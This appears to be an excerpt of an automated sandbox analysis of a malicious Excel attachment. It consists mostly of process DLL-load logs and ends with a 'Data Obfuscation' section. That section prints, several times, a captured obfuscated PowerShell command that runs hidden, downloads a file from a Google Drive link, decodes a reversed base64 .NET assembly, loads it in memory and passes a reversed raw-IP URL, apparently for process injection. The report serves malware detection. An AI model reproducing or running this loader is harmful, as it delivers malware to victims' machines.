Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: A & C Metrology OC 5457144.xls Static file information: File size 1081344 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdb source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdbhP source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdbhP source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdb source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
Source: 54330000.0.dr Initial sample: OLE indicators vbamacros = False
Source: A & C Metrology OC 5457144.xls Initial sample: OLE indicators encrypted = True

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') 